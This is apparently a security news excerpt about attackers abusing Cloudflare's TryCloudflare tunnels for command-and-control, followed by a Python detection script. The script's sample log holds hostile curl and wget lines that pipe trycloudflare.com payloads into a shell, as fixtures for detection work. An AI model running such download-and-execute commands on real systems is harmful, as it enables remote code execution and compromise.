Attackers exploit TryCloudflare to gain an advantage
August 17, 2023 – Published on CSO
Once they gain remote code execution, the attackers run a curl command to download and execute a malicious script from a command-and-control (C2) server with a trycloudflare.com hostname. TryCloudflare is a free-tier service provided by Cloudflare for users to evaluate various platform features. Attackers have been known to abuse it to hide the real location of their C2 server, since Cloudflare's CDN acts as a proxy in between.
Once executed on a system, the script checks whether the watchdog process is running and tries to kill it, deletes files left by previous infections, disables Tencent Cloud and Alibaba defensive measures, downloads additional malicious binaries, sets up new system services, modifies cron jobs to achieve persistence, and collects locally stored SSH keys, which are then used for lateral movement to other systems.
To obfuscate their communication with the C2 servers, the attackers deployed Cloudflare Tunnel, a traffic tunneling solution that lets users expose local services through Cloudflare's network without changing firewall settings or setting up port forwarding. Researchers from GuidePoint Security recently reported an increase in the number of attacks that abused Cloudflare Tunnel and TryCloudflare.
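As an added example (not from the article or from GuidePoint Security), the following detection logic scans command-audit lines for the download-and-execute pattern described above, flagging any trycloudflare.com URL and rating it higher when the download is piped straight into a shell. The log lines are constructed for illustration; the "timestamp user command" layout is an assumption about the exporter's format.

```python
import re
from typing import List, Dict

# Constructed sample command-audit lines (not from the article). Each line is
# "<timestamp> <user> <command>", an assumed EDR/auditd exporter layout.
SAMPLE_LOG = """\
2023-08-17T10:01:02Z www-data curl -fsSL https://abc-def-ghi.trycloudflare.com/x.sh | sh
2023-08-17T10:01:05Z www-data pkill -f watchdog
2023-08-17T10:02:00Z www-data curl -s https://jkl-mno.trycloudflare.com/bin -o /tmp/bin
2023-08-17T10:02:10Z www-data crontab -l
2023-08-17T10:03:00Z root curl -s https://repo.example.com/release.tar.gz -o release.tar.gz
2023-08-17T10:04:00Z www-data wget -qO- http://xyz.trycloudflare.com/payload | bash
"""

# Any URL on a trycloudflare.com hostname (the free-tier tunnel domain).
TUNNEL_HOST = re.compile(r"https?://[a-z0-9-]+\.trycloudflare\.com/", re.I)
# curl/wget output piped directly into a shell: download-and-execute.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b")

def classify(command: str) -> str:
    """Return 'high' when a TryCloudflare URL is piped into a shell,
    'medium' for any other TryCloudflare URL, and 'none' otherwise."""
    if not TUNNEL_HOST.search(command):
        return "none"
    return "high" if PIPE_TO_SHELL.search(command) else "medium"

def scan(log_text: str) -> List[Dict[str, str]]:
    """Parse audit lines and return the ones that reference a tunnel host."""
    findings = []
    for line in log_text.splitlines():
        ts, user, cmd = line.split(" ", 2)
        severity = classify(cmd)
        if severity != "none":
            findings.append({"ts": ts, "user": user,
                             "severity": severity, "cmd": cmd})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ts']} {f['user']}: {f['cmd']}")
```

In production the same rule would also be worth applying to cron entries and service unit files, since the script described above persists through both.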